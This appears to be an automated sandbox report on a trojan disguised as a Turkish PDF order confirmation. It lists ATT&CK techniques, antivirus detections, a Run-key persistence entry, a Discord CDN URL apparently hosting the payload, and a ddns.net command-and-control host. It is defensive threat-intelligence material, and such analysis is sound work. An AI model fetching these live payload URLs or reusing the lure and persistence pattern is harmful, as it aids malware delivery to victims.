                    DLL Side-Loading                    		1
                    DLL Side-Loading                    		1
                    Deobfuscate/Decode Files or Information                    		1
                    OS Credential Dumping                    		1
                    System Time Discovery                    		Remote Services1
                    Archive Collected Data                    		Exfiltration Over Other Network Medium22
                    Ingress Tool Transfer                    		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without Authorization1
                    System Shutdown/Reboot
                    Default Accounts1
                    Command and Scripting Interpreter                    		1
                    Windows Service                    		1
                    Access Token Manipulation                    		2
                    Obfuscated Files or Information                    		221
                    Input Capture                    		1
                    Account Discovery                    		Remote Desktop Protocol221
                    Input Capture                    		Exfiltration Over Bluetooth11
                    Encrypted Channel                    		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without Authorization1
                    Defacement
                    Domain Accounts2
                    Service Execution                    		1
                    Registry Run Keys / Startup Folder                    		1
                    Windows Service                    		1
                    Software Packing                    		2
                    Credentials In Files                    		1
                    System Service Discovery                    		SMB/Windows Admin Shares2
                    Clipboard Data                    		Automated Exfiltration1
                    Non-Standard Port                    		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                    Local AccountsAt (Windows)Logon Script (Mac)522
                    Process Injection                    		1
                    DLL Side-Loading                    		NTDS2
                    File and Directory Discovery                    		Distributed Component Object ModelInput CaptureScheduled Transfer1
                    Remote Access Software                    		SIM Card SwapCarrier Billing Fraud
                    Cloud AccountsCronNetwork Logon Script1
                    Registry Run Keys / Startup Folder                    		1
                    Masquerading                    		LSA Secrets33
                    System Information Discovery                    		SSHKeyloggingData Transfer Size Limits2
                    Non-Application Layer Protocol                    		Manipulate Device CommunicationManipulate App Store Rankings or Ratings
                    Replication Through Removable MediaLaunchdRc.commonRc.common1
                    Access Token Manipulation                    		Cached Domain Credentials11
                    Security Software Discovery                    		VNCGUI Input CaptureExfiltration Over C2 Channel23
                    Application Layer Protocol                    		Jamming or Denial of ServiceAbuse Accessibility Features
                    External Remote ServicesScheduled TaskStartup ItemsStartup Items522
                    Process Injection                    		DCSync2
                    Process Discovery                    		Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                    Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc Filesystem1
                    System Owner/User Discovery                    		Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
                    Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Masquerading/etc/passwd and /etc/shadow1
                    Remote System Discovery                    		Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction

                    Behavior Graph

                    Hide Legend

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet
                    behaviorgraph top1 signatures2 2 Behavior Graph ID: 652390 Sample: Yeni sipari#U015fi onaylay#... Startdate: 26/06/2022 Architecture: WINDOWS Score: 100 45 Snort IDS alert for network traffic 2->45 47 Malicious sample detected (through community Yara rule) 2->47 49 Multi AV Scanner detection for submitted file 2->49 51 6 other signatures 2->51 6 Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe 1 17 2->6         started        11 Eluiezilfw.exe 13 2->11         started        13 Eluiezilfw.exe 13 2->13         started        process3 dnsIp4 27 cdn.discordapp.com 162.159.130.233, 443, 49716, 49719 CLOUDFLARENETUS United States 6->27 29 192.168.2.1 unknown unknown 6->29 23 C:\Users\Public\Librariesluiezilfw.exe, PE32 6->23 dropped 25 C:\Users\...luiezilfw.exe:Zone.Identifier, ASCII 6->25 dropped 53 Writes to foreign memory regions 6->53 55 Allocates memory in foreign processes 6->55 57 Creates a thread in another existing process (thread injection) 6->57 15 logagent.exe 2 6->15         started        31 162.159.133.233, 443, 49745 CLOUDFLARENETUS United States 11->31 59 Multi AV Scanner detection for dropped file 11->59 61 Injects a PE file into a foreign processes 11->61 19 logagent.exe 11->19         started        33 162.159.134.233, 443, 49751 CLOUDFLARENETUS United States 13->33 21 DpiScaling.exe 13->21         started        file5 signatures6 process7 dnsIp8 35 blessmyhustlelord.ddns.net 37.0.14.195, 49746, 49747, 49749 WKD-ASIE Netherlands 15->35 37 Contains functionalty to change the wallpaper 15->37 39 Found stalling execution ending in API Sleep call 15->39 41 Contains functionality to steal Chrome passwords or cookies 15->41 43 4 other signatures 15->43 signatures9

                    Screenshots

                    Thumbnails

                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                    windows-stand

                    Antivirus, Machine Learning and Genetic Malware Detection

                    Initial Sample

                    SourceDetectionScannerLabelLink
                    Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe22%ReversingLabsWin32.Trojan.Zusy

                    Dropped Files

                    SourceDetectionScannerLabelLink
                    C:\Users\Public\Libraries\Eluiezilfw.exe22%ReversingLabsWin32.Trojan.Zusy

                    Unpacked PE Files

                    SourceDetectionScannerLabelLinkDownload
                    0.3.Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe.396c008.6.unpack100%AviraTR/Patched.Ren.GenDownload File
                    8.3.Eluiezilfw.exe.3ac4348.64.unpack100%AviraTR/Patched.Ren.GenDownload File
                    8.3.Eluiezilfw.exe.3acbbdc.14.unpack100%AviraTR/Patched.Ren.GenDownload File
                    0.3.Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe.3962dac.51.unpack100%AviraTR/Patched.Ren.GenDownload File
                    3.2.logagent.exe.400000.0.unpack100%AviraBDS/Backdoor.GenDownload File
                    13.3.Eluiezilfw.exe.3ac5ecc.84.unpack100%AviraTR/Patched.Ren.GenDownload File
                    0.3.Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe.39600d8.18.unpack100%AviraTR/Patched.Ren.GenDownload File
                    13.3.Eluiezilfw.exe.3ac1b54.30.unpack100%AviraTR/Patched.Ren.GenDownload File
                    13.3.Eluiezilfw.exe.3ac0168.21.unpack100%AviraTR/Patched.Ren.GenDownload File
                    3.0.logagent.exe.10540000.2.unpack100%AviraTR/Crypt.Morphine.GenDownload File
                    0.3.Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe.39717a0.68.unpack100%AviraTR/Patched.Ren.GenDownload File
                    0.3.Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe.397dbec.69.unpack100%AviraTR/Patched.Ren.GenDownload File
                    13.3.Eluiezilfw.exe.3ac7bf0.17.unpack100%AviraTR/Patched.Ren.GenDownload File
                    13.3.Eluiezilfw.exe.3ac413c.59.unpack100%AviraTR/Patched.Ren.GenDownload File
                    13.3.Eluiezilfw.exe.3ac3034.55.unpack100%AviraTR/Patched.Ren.GenDownload File
                    0.3.Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe.3984008.36.unpack100%AviraTR/Patched.Ren.GenDownload File
                    8.3.Eluiezilfw.exe.3ad28f8.32.unpack100%AviraTR/Patched.Ren.GenDownload File
                    0.3.Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe.397afd8.34.unpack100%AviraTR/Patched.Ren.GenDownload File
                    0.3.Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe.3962d80.39.unpack100%AviraTR/Patched.Ren.GenDownload File
                    13.3.Eluiezilfw.exe.3ad8008.106.unpack100%AviraTR/Patched.Ren.GenDownload File
                    13.3.Eluiezilfw.exe.3ac0168.20.unpack100%AviraTR/Patched.Ren.GenDownload File
                    8.3.Eluiezilfw.exe.3ad17a0.66.unpack100%AviraTR/Patched.Ren.GenDownload File
                    8.3.Eluiezilfw.exe.3ac8560.26.unpack100%AviraTR/Patched.Ren.GenDownload File
                    13.3.Eluiezilfw.exe.3ad9a8c.88.unpack100%AviraTR/Patched.Ren.GenDownload File
                    0.2.Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe.2324788.2.unpack100%AviraTR/Patched.Ren.GenDownload File
                    13.3.Eluiezilfw.exe.3ac00d8.18.unpack100%AviraTR/Patched.Ren.GenDownload File
                    8.3.Eluiezilfw.exe.3ac803c.108.unpack100%AviraTR/Patched.Ren.GenDownload File
                    13.3.Eluiezilfw.exe.3adbf00.62.unpack100%AviraTR/Patched.Ren.GenDownload File
                    13.3.Eluiezilfw.exe.3adafd8.34.unpack100%AviraTR/Patched.Ren.GenDownload File
                    15.0.DpiScaling.exe.10540000.3.unpack100%AviraTR/Crypt.Morphine.GenDownload File
                    13.3.Eluiezilfw.exe.3ad54e0.103.unpack100%AviraTR/Patched.Ren.GenDownload File
                    8.3.Eluiezilfw.exe.3acd700.50.unpack100%AviraTR/Patched.Ren.GenDownload File
                    8.3.Eluiezilfw.exe.3ad001c.61.unpack100%AviraTR/Patched.Ren.GenDownload File
                    8.3.Eluiezilfw.exe.3acff08.23.unpack100%AviraTR/Patched.Ren.GenDownload File
                    13.3.Eluiezilfw.exe.3acc008.6.unpack100%AviraTR/Patched.Ren.GenDownload File
                    0.3.Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe.3966c84.100.unpack100%AviraTR/Patched.Ren.GenDownload File
                    0.3.Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe.397afd8.37.unpack100%AviraTR/Patched.Ren.GenDownload File
                    13.3.Eluiezilfw.exe.3addbec.69.unpack100%AviraTR/Patched.Ren.GenDownload File
                    8.3.Eluiezilfw.exe.3ac6d08.106.unpack100%AviraTR/Patched.Ren.GenDownload File
                    8.3.Eluiezilfw.exe.3ac7bf0.16.unpack100%AviraTR/Patched.Ren.GenDownload File
                    0.3.Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe.3960168.22.unpack100%AviraTR/Patched.Ren.GenDownload File
                    0.3.Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe.3986a8c.81.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                    8.3.Eluiezilfw.exe.3ac4578.12.unpack100%AviraTR/Patched.Ren.GenDownload File
                    13.3.Eluiezilfw.exe.3ac52c8.8.unpack100%AviraTR/Patched.Ren.GenDownload File
                    0.2.Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe.10540000.8.unpack100%AviraTR/Crypt.Morphine.GenDownload File
                    0.3.Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe.3964ae4.70.unpack100%AviraTR/Patched.Ren.GenDownload File
                    8.3.Eluiezilfw.exe.3ac0168.20.unpack100%AviraTR/Patched.Ren.GenDownload File
                    8.3.Eluiezilfw.exe.3ac217c.47.unpack100%AviraTR/Patched.Ren.GenDownload File
                    0.3.Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe.39754e0.101.unpack100%AviraTR/Patched.Ren.GenDownload File
                    3.0.logagent.exe.10540000.3.unpack100%AviraTR/Crypt.Morphine.GenDownload File
                    8.3.Eluiezilfw.exe.3ad54e0.103.unpack100%AviraTR/Patched.Ren.GenDownload File
                    8.3.Eluiezilfw.exe.3ac2dac.51.unpack100%AviraTR/Patched.Ren.GenDownload File
                    0.3.Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe.3974008.91.unpack100%AviraTR/Patched.Ren.GenDownload File
                    13.2.Eluiezilfw.exe.23a33e8.3.unpack100%AviraTR/Patched.Ren.GenDownload File
                    0.3.Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe.39728f8.32.unpack100%AviraTR/Patched.Ren.GenDownload File
                    0.2.Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe.3ad0000.7.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                    8.3.Eluiezilfw.exe.3ac6924.76.unpack100%AviraTR/Patched.Ren.GenDownload File
                    0.3.Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe.395e240.8.unpack100%AviraTR/Patched.Ren.GenDownload File
                    8.3.Eluiezilfw.exe.3acc6a8.43.unpack100%AviraTR/Patched.Ren.GenDownload File
                    13.3.Eluiezilfw.exe.3ac52c8.9.unpack100%AviraTR/Patched.Ren.GenDownload File
                    13.3.Eluiezilfw.exe.3ad94ec.80.unpack100%AviraTR/Patched.Ren.GenDownload File
                    0.3.Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe.395dda4.0.unpack100%AviraTR/Patched.Ren.GenDownload File
                    8.3.Eluiezilfw.exe.3adf8dc.45.unpack100%AviraTR/Patched.Ren.GenDownload File
                    13.3.Eluiezilfw.exe.3adbf00.63.unpack100%AviraTR/Patched.Ren.GenDownload File
                    8.3.Eluiezilfw.exe.3ac704c.4.unpack100%AviraTR/Patched.Ren.GenDownload File
                    13.3.Eluiezilfw.exe.3acbbdc.14.unpack100%AviraTR/Patched.Ren.GenDownload File
                    0.3.Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe.396dc40.56.unpack100%AviraTR/Patched.Ren.GenDownload File
                    13.3.Eluiezilfw.exe.3ad3e08.79.unpack100%AviraTR/Patched.Ren.GenDownload File
                    13.3.Eluiezilfw.exe.3ac6d08.105.unpack100%AviraTR/Patched.Ren.GenDownload File
                    13.3.Eluiezilfw.exe.3acc6a8.43.unpack100%AviraTR/Patched.Ren.GenDownload File
                    14.0.logagent.exe.10540000.0.unpack100%AviraTR/Crypt.Morphine.GenDownload File
                    0.3.Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe.3966d08.105.unpack100%AviraTR/Patched.Ren.GenDownload File
                    8.3.Eluiezilfw.exe.3ad94ec.80.unpack100%AviraTR/Patched.Ren.GenDownload File
                    13.3.Eluiezilfw.exe.3ad94ec.82.unpack100%AviraTR/Patched.Ren.GenDownload File
                    14.2.logagent.exe.10540000.1.unpack100%AviraTR/Crypt.Morphine.GenDownload File
                    8.2.Eluiezilfw.exe.3168bd8.4.unpack100%AviraTR/Patched.Ren.GenDownload File
                    0.3.Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe.396bbdc.13.unpack100%AviraTR/Patched.Ren.GenDownload File
                    13.3.Eluiezilfw.exe.3ac217c.47.unpack100%AviraTR/Patched.Ren.GenDownload File
                    13.3.Eluiezilfw.exe.3ad4008.91.unpack100%AviraTR/Patched.Ren.GenDownload File
                    8.2.Eluiezilfw.exe.10540000.8.unpack100%AviraTR/Crypt.Morphine.GenDownload File
                    0.3.Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe.3966588.94.unpack100%AviraTR/Patched.Ren.GenDownload File
                    8.3.Eluiezilfw.exe.3ac2d80.39.unpack100%AviraTR/Patched.Ren.GenDownload File
                    0.3.Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe.396217c.48.unpack100%AviraTR/Patched.Ren.GenDownload File
                    8.3.Eluiezilfw.exe.3ae6a8c.81.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                    0.3.Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe.396c008.5.unpack100%AviraTR/Patched.Ren.GenDownload File
                    13.3.Eluiezilfw.exe.3ac00d8.19.unpack100%AviraTR/Patched.Ren.GenDownload File
                    13.3.Eluiezilfw.exe.3acdc40.54.unpack100%AviraTR/Patched.Ren.GenDownload File
                    8.3.Eluiezilfw.exe.3add83c.75.unpack100%AviraTR/Patched.Ren.GenDownload File
                    13.3.Eluiezilfw.exe.3ac26fc.2.unpack100%AviraTR/Patched.Ren.GenDownload File
                    8.3.Eluiezilfw.exe.3ac8008.21.unpack100%AviraTR/Patched.Ren.GenDownload File
                    13.3.Eluiezilfw.exe.3ac26fc.0.unpack100%AviraTR/Patched.Ren.GenDownload File
                    14.0.logagent.exe.10540000.2.unpack100%AviraTR/Crypt.Morphine.GenDownload File
                    13.3.Eluiezilfw.exe.3ae4008.36.unpack100%AviraTR/Patched.Ren.GenDownload File
                    8.3.Eluiezilfw.exe.3ac03a8.25.unpack100%AviraTR/Patched.Ren.GenDownload File
                    3.0.logagent.exe.10540000.1.unpack100%AviraTR/Crypt.Morphine.GenDownload File
                    8.3.Eluiezilfw.exe.3ac1b54.29.unpack100%AviraTR/Patched.Ren.GenDownload File
                    0.3.Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe.3962d80.40.unpack100%AviraTR/Patched.Ren.GenDownload File
                    13.3.Eluiezilfw.exe.3acbbdc.13.unpack100%AviraTR/Patched.Ren.GenDownload File
                    0.3.Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe.396704c.3.unpack100%AviraTR/Patched.Ren.GenDownload File
                    13.3.Eluiezilfw.exe.3add83c.75.unpack100%AviraTR/Patched.Ren.GenDownload File

                    Domains

                    SourceDetectionScannerLabelLink
                    blessmyhustlelord.ddns.net2%VirustotalBrowse

                    URLs

                    SourceDetectionScannerLabelLink
                    Pw`~hustlelord.ddns.net0%Avira URL Cloudsafe

                    Domains and IPs

                    Contacted Domains

                    NameIPActiveMaliciousAntivirus DetectionReputation
                    blessmyhustlelord.ddns.net
                    		37.0.14.195
                    		truetrueunknown
                    cdn.discordapp.com
                    		162.159.130.233
                    		truefalse
                      		high

                      Contacted URLs

                      NameMaliciousAntivirus DetectionReputation
                      https://cdn.discordapp.com/attachments/990482594137251863/990489253987360768/Eluiezilfwmdrgrdfrqpnwmurrnwnhmfalse
                        		high
                        Pw`~hustlelord.ddns.nettrue
                        • Avira URL Cloud: safe
                        		unknown

                        URLs from Memory and Binaries

                        NameSourceMaliciousAntivirus DetectionReputation
                        https://cdn.discordapp.com/attachments/990482594137251863/990489253987360768/EluiezilfwmdrgrdfrqpnwmEluiezilfw.exe, 00000008.00000002.347399894.0000000003760000.00000004.00001000.00020000.00000000.sdmpfalse
                          		high
                          https://cdn.discordapp.com/Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe, 00000000.00000003.278138835.00000000007C1000.00000004.00000020.00020000.00000000.sdmp, Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe, 00000000.00000002.310588608.00000000007BC000.00000004.00000020.00020000.00000000.sdmp, Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe, 00000000.00000002.310005988.0000000000775000.00000004.00000020.00020000.00000000.sdmpfalse
                            		high
                            https://cdn.discordapp.com/.Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe, 00000000.00000002.310005988.0000000000775000.00000004.00000020.00020000.00000000.sdmpfalse
                              		high
                              https://cdn.discordapp.com/2yYeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe, 00000000.00000003.278138835.00000000007C1000.00000004.00000020.00020000.00000000.sdmp, Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe, 00000000.00000002.310588608.00000000007BC000.00000004.00000020.00020000.00000000.sdmpfalse
                                		high

                                World Map of Contacted IPs

                                • No. of IPs < 25%
                                • 25% < No. of IPs < 50%
                                • 50% < No. of IPs < 75%
                                • 75% < No. of IPs

                                Public IPs

                                IPDomainCountryFlagASNASN NameMalicious
                                162.159.130.233
                                		cdn.discordapp.comUnited States
                                		13335CLOUDFLARENETUSfalse
                                37.0.14.195
                                		blessmyhustlelord.ddns.netNetherlands
                                		198301WKD-ASIEtrue
                                162.159.133.233
                                		unknownUnited States
                                		13335CLOUDFLARENETUSfalse
                                162.159.134.233
                                		unknownUnited States
                                		13335CLOUDFLARENETUSfalse

                                Private

                                IP
                                192.168.2.1

                                General Information

                                Joe Sandbox Version:35.0.0 Citrine
                                Analysis ID:652390
                                Start date and time: 26/06/202209:41:342022-06-26 09:41:34 +02:00
                                Joe Sandbox Product:CloudBasic
                                Overall analysis duration:0h 11m 53s
                                Hypervisor based Inspection enabled:false
                                Report type:full
                                Sample file name:Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe
                                Cookbook file name:default.jbs
                                Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                Number of analysed new started processes analysed:29
                                Number of new started drivers analysed:0
                                Number of existing processes analysed:0
                                Number of existing drivers analysed:0
                                Number of injected processes analysed:0
                                Technologies:
                                • HCA enabled
                                • EGA enabled
                                • HDC enabled
                                • AMSI enabled
                                Analysis Mode:default
                                Analysis stop reason:Timeout
                                Detection:MAL
                                Classification:mal100.rans.troj.spyw.expl.evad.winEXE@9/5@19/5
                                EGA Information:
                                • Successful, ratio: 50%
                                HDC Information:
                                • Successful, ratio: 59.3% (good quality ratio 42.3%)
                                • Quality average: 52.1%
                                • Quality standard deviation: 41.1%
                                HCA Information:
                                • Successful, ratio: 97%
                                • Number of executed functions: 34
                                • Number of non-executed functions: 230
                                Cookbook Comments:
                                • Found application associated with file extension: .exe
                                • Adjust boot time
                                • Enable AMSI

                                Warnings

                                • Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, WmiPrvSE.exe, svchost.exe, wuapihost.exe
                                • Excluded IPs from analysis (whitelisted): 20.238.103.94, 20.223.24.244
                                • Excluded domains from analysis (whitelisted): www.bing.com, fs.microsoft.com, asf-ris-prod-neu-azsc.northeurope.cloudapp.azure.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, ris-prod.trafficmanager.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, arc.msn.com, ris.api.iris.microsoft.com, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, store-images.s-microsoft.com, login.live.com, sls.update.microsoft.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net
                                • Execution Graph export aborted for target Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe, PID 6356 because there are no executed function
                                • Not all processes where analyzed, report is missing behavior information
                                • Report creation exceeded maximum time and may have missing disassembly code information.
                                • Report size exceeded maximum capacity and may have missing behavior information.
                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                • Report size getting too big, too many NtQueryValueKey calls found.

                                Simulations

                                Behavior and APIs

                                TimeTypeDescription
                                09:42:46API Interceptor1x Sleep call for process: Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe modified
                                09:42:55AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Eluiezilfw C:\Users\Public\Libraries\wflizeiulE.url
                                09:43:05AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Eluiezilfw C:\Users\Public\Libraries\wflizeiulE.url
                                09:43:07API Interceptor2x Sleep call for process: Eluiezilfw.exe modified

                                Joe Sandbox View / Context

                                IPs

                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                162.159.130.233MSQNZmmg2F.exeGet hashmaliciousBrowse
                                • cdn.discordapp.com/attachments/898638713985302540/898905970657345626/al.exe
                                b7cwlpwH6S.exeGet hashmaliciousBrowse
                                • cdn.discordapp.com/attachments/878382243242983437/878684457245220884/mrmoms.exe
                                order-confirmation.doc__.rtfGet hashmaliciousBrowse
                                • cdn.discordapp.com/attachments/843685789120331799/847476783744811018/OtI.exe
                                Order Confirmation.docGet hashmaliciousBrowse
                                • cdn.discordapp.com/attachments/843685789120331799/847476783744811018/OtI.exe
                                cfe14e87_by_Libranalysis.rtfGet hashmaliciousBrowse
                                • cdn.discordapp.com/attachments/520353354304585730/839557970173100102/ew.exe
                                SkKcQaHEB8.exeGet hashmaliciousBrowse
                                • cdn.discordapp.com/attachments/808882061918076978/836771636082376724/VMtEguRH.exe
                                P20200107.DOCGet hashmaliciousBrowse
                                • cdn.discordapp.com/attachments/808882061918076978/836771636082376724/VMtEguRH.exe
                                FBRO ORDER SHEET - YATSAL SUMMER 2021.exeGet hashmaliciousBrowse
                                • cdn.discordapp.com/attachments/832005460982235229/836405556838924308/usd.exe
                                SKM_C258 Up21042213080.exeGet hashmaliciousBrowse
                                • cdn.discordapp.com/attachments/832005460982235229/834717762281930792/12345.exe
                                SKM_C258 Up21042213080.exeGet hashmaliciousBrowse
                                • cdn.discordapp.com/attachments/832005460982235229/834717762281930792/12345.exe
                                G019 & G022 SPEC SHEET.exeGet hashmaliciousBrowse
                                • cdn.discordapp.com/attachments/832005460982235229/834598381472448573/23456.exe
                                Marking Machine 30W Specification.exeGet hashmaliciousBrowse
                                • cdn.discordapp.com/attachments/832005460982235229/834598381472448573/23456.exe
                                2021 RFQ Products Required.docGet hashmaliciousBrowse
                                • cdn.discordapp.com/attachments/821511904769998921/821511945881911306/panam.exe
                                Company Reference1.docGet hashmaliciousBrowse
                                • cdn.discordapp.com/attachments/819949436054536222/820935251337281546/nbalax.exe
                                PAY SLIP.docGet hashmaliciousBrowse
                                • cdn.discordapp.com/attachments/788946375533789214/788947376849027092/atlasx.scr
                                SecuriteInfo.com.Exploit.Rtf.Obfuscated.16.25071.rtfGet hashmaliciousBrowse
                                • cdn.discordapp.com/attachments/785423761461477416/785424240047947786/angelrawfile.exe
                                part1.rtfGet hashmaliciousBrowse
                                • cdn.discordapp.com/attachments/783666652440428545/783667553490698250/kdot.exe

                                Domains

                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                cdn.discordapp.com3F947F5A849F11BE9079A5C2418240E2FAF7E53B63662.exeGet hashmaliciousBrowse
                                • 162.159.135.233
                                Cnxsc.exeGet hashmaliciousBrowse
                                • 162.159.134.233
                                New Europe RFQ & Samples for June-2022_Purchase_0622.exeGet hashmaliciousBrowse
                                • 162.159.133.233
                                854F1E97-5DBB-4A87-A566-33D9012B05E2 pdf.exeGet hashmaliciousBrowse
                                • 162.159.135.233
                                Inquiry.exeGet hashmaliciousBrowse
                                • 162.159.134.233
                                SecuriteInfo.com.Variant.Zusy.427341.31777.exeGet hashmaliciousBrowse
                                • 162.159.134.233
                                SecuriteInfo.com.Variant.Zusy.427341.1751.exeGet hashmaliciousBrowse
                                • 162.159.129.233
                                dmTIRVid3Q.exeGet hashmaliciousBrowse
                                • 162.159.134.233
                                SecuriteInfo.com.Variant.Zusy.427341.28656.exeGet hashmaliciousBrowse
                                • 162.159.134.233
                                Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exeGet hashmaliciousBrowse
                                • 162.159.130.233
                                Yeni sipari#U015fi onayla - TK176H,pdf.exeGet hashmaliciousBrowse
                                • 162.159.134.233
                                854F1E97-5DBB-4A87-A566-33D9012B05E2 pdf.exeGet hashmaliciousBrowse
                                • 162.159.133.233
                                SecuriteInfo.com.Variant.Zusy.427341.3668.exeGet hashmaliciousBrowse
                                • 162.159.130.233
                                Invoice.exeGet hashmaliciousBrowse
                                • 162.159.135.233
                                Ouicbvpfj.exeGet hashmaliciousBrowse
                                • 162.159.133.233
                                New RFQ & Samples for June-2022_Purchases_0622.exeGet hashmaliciousBrowse
                                • 162.159.133.233
                                6B937D3A1B40C91B722492630B135DDF35542058F27EB.exeGet hashmaliciousBrowse
                                • 162.159.129.233
                                DA362DFF8B39C6B4B92387F48F5BEB91CE55DBDF8BFE6.exeGet hashmaliciousBrowse
                                • 162.159.129.233
                                SecuriteInfo.com.W32.AIDetectNet.01.711.exeGet hashmaliciousBrowse
                                • 162.159.133.233
                                BL.exeGet hashmaliciousBrowse
                                • 162.159.135.233
                                blessmyhustlelord.ddns.netYeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exeGet hashmaliciousBrowse
                                • 37.0.14.195

                                ASNs

                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                CLOUDFLARENETUShttp://aolfgmqkvkwdhjg.comGet hashmaliciousBrowse
                                • 188.114.96.3
                                Start.exeGet hashmaliciousBrowse
                                • 162.159.135.232
                                06-21-2022 Order _8678498578378598489304885909394899.exeGet hashmaliciousBrowse
                                • 188.114.96.3
                                3F947F5A849F11BE9079A5C2418240E2FAF7E53B63662.exeGet hashmaliciousBrowse
                                • 104.21.29.233
                                https://huhgul.com/Get hashmaliciousBrowse
                                • 104.17.25.14
                                #U70b9#U51fb#U5b89#U88c5-#U7eb8#U98de#U673a#U7b80#U4f53#U4e2d#U6587#U8bed#U8a00#U5305.exeGet hashmaliciousBrowse
                                • 188.114.97.3
                                http://www.haynun.market/klsrbljajj/uxgd861832hxrudoa/4yLoWMq8GZoV-T_OMk7RhaV2bfeD9NL8SzMXVM66Y9g/hXstoBmTS4iEityW7B2Bq_kGa-PZEIWghzLSkHBUYdr6zWlsZK5ifaV-tgHWbVJcfkBu00UH_N9QF_JW7HZ3zodWVXkHsMX2N9o-guC0fnjQc2MH388-uNXffVXZJapdGet hashmaliciousBrowse
                                • 172.66.43.115
                                Nitro Gen 6.6v.exeGet hashmaliciousBrowse
                                • 162.159.128.233
                                MV SEA CREDENCE_VENDOR-TEMPLATE_FORM.exeGet hashmaliciousBrowse
                                • 104.21.65.246
                                Cnxsc.exeGet hashmaliciousBrowse
                                • 162.159.134.233
                                5Qg0FFYoQd.exeGet hashmaliciousBrowse
                                • 188.114.97.3
                                DHL-27-6-2022.pdf.exeGet hashmaliciousBrowse
                                • 172.67.154.72
                                https://kmctcoeemergingtechnology.org/vldGet hashmaliciousBrowse
                                • 104.18.11.207
                                Invoice.htmlGet hashmaliciousBrowse
                                • 104.17.25.14
                                https://www.namaraclarkebetheldkb.com/Get hashmaliciousBrowse
                                • 104.17.25.14
                                New Europe RFQ & Samples for June-2022_Purchase_0622.exeGet hashmaliciousBrowse
                                • 162.159.134.233
                                DHL_Shipping Documents_pdf_98567.exeGet hashmaliciousBrowse
                                • 104.17.104.76
